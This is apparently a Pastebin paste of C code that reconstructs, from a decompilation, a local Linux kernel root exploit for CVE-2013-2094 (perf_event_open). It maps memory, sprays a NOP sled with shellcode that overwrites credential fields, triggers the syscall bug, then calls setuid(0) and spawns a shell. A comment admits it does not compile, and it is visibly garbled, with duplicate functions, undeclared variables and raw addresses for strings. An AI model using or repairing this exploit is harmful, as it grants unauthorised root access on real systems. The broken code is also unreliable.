Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include<stdio.h>
- //コンパイルはうまくいきません。
- //CVE-2013-2094
- int g_fd;
- void sc() {
- goto sc_next;
- sc_next:
- }
- void morte() {
- puts(0x401214);
- close(g_fd);
- dropshell();
- }
- void dropshell() {
- setuid(0);
- errx(1, 0x4011dd);
- puts(0x4011f1);
- execl(0x40120c, 0x401209, NULL);
- exit(0);
- }
- int perf_open() {
- int local_12[0x50];
- memset(local_12, 0, 0x50);
- return syscall(0x12a, *local_12, 0, -1, -1, 0);
- }
- void sc_replace(char *a, char *b, int c) {
- char *local_3 = a;
- char *local_3_4 = b;
- int local_4 = c;
- local_1 = memmem(local_3, 0x384, local_3_4, 4);
- if(local_1 == 0) {
- errx(1, "can't find %x", local_3_4);
- }
- memcpy(local_1, local_4, 4);
- }
- void trigger(int a) {
- local_2_4 = a;
- if(local_2_4 != 4 ) {
- if(local_2_4 != 0x80) {
- if(local_2_4 == 0) {
- local_1 = 1;
- local_0_4 = 1;
- local_1 -= 1;
- //local_0_4 >> 16;
- local_1 = local_0_4 / local_1;
- }else {
- errx(1, "unknown intr %d", local_2_4);
- }
- }else {
- //int 0x80
- }
- }else {
- //int 4
- }
- sleep(3);
- }
- int map_mem() {
- int ret = mmap(local_3, 0x10000000, 3, 0x32, 0xffffffff, 0);
- if(ret == -1) {
- err(1, "mmap()");
- }
- return ret;
- }
- void sc() {
- int i;
- int local_5 = *(&i & 0xffffffffffffe000);
- int local_4 = local_5 >> 24;
- int local_3 = 0xdeadbef0;
- int local_2_4 = 0xdeadbef1;
- i = 0;
- for(;i < 0xf9f; i += 4) {
- int *local_2 = &(*(local_5 + i));
- int local_1 = *local_2;
- if(*(local_2 + 2) == *local_2) {
- if(*local_2 >> 24 == local_4) {
- for(int j = 0;j < 0x13; j++) {
- if(*(local_1 + (j << 2)) == local_2_4) {
- i = 0;
- if(i <= 6) {
- *(((i + j) << 2) + local_1) = 0;
- return 0;
- }
- }
- }
- }
- }
- }
- }
- int find_mem(int *a, int b) {
- int *local_3 = a;
- char local_3_4 = (char)b;
- local_1 = local_3;
- local_1_4 = 0;
- while(local_1_4 > -1) {
- if(*(local_1_4 + local_1) == local_3_4) {
- return local_1_4;
- }
- }
- return -1;
- }
- int main() {
- puts("exploit local PRIVAT compilat de ps");
- puts("caut vulnerabilitatea...");
- int local_0_4 = 4;
- int local_1 = 4;
- void *local_4 = map_mem(0x380000000);
- void *v2 = map_mem(0x1780000000);
- memset(v2, 0x69, 0x10000000);
- int local_4 = -1;
- int v2 = 0;
- int v3 = perf_open(local_4);
- close(v3);
- void *v4;
- int v5 = find_mem(local_4, 0xff);
- if(v5 == -1) {
- errx(1, "neah ... nu poti lua root pe asta");
- }
- int local_1 = 0x18;
- int v7 = 0x80000000;
- int v8 = 0x17;
- munmap(local_4, 0x10000000);
- munmap(v2, 0x10000000);
- v7 += v5;
- v7 -= local_4 * local_1; //-1 * local_1
- //sidt
- local_4 = v7 - *(ebp - local_9_6);
- local_4 -= v7 - *(ebp - local_9_6);
- if(local_4 % local_1 != 8) {
- if(local_4 % local_1 != 0x10) {
- if(local_4 % local_1 == 0) {
- }else {
- errx(1, "remainder %d", local_1 % local_4);
- }
- }else{
- local_0_4 = 4;
- }
- }else {
- local_0_4 = 0x80;
- }
- local_4 -= local_0_4 << 4;
- if(local_1 % local4 != 0) {
- __assert_fail("(off % sz) == 0", 0x4012af, 0xf4, main)//?
- }
- local_13 = local_1
- local_2 = -local_4 / local_13;
- local_2 = local_9_6 & 0xff000000;
- int ret = mmap(local_2, 0x2000000, 7, 0x32, 0xffffffff, 0);
- if(ret == 0xff) {
- err(0, 1, "mmap()");
- }
- memset(local_2, 0x90, 0x2000000);
- local_2 += 0x1fffc00;
- local_4_4 = sc_next - sc_start;
- memcpy(local_2, sc_start, local_4_4);
- local_2 += local_4_4;
- memcpy(local_2, sym.sc, 0x384);
- sc_replace(local_2, 0xdeadbef0, getuid());
- sc_replace(local_2, 0xdeadbef1, getuid());
- signal(0xe, morte);//signal for alarm
- alarm(2);
- g_fd = perf_open(local_4);
- trigger(local_0_4);
- exit(0);
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement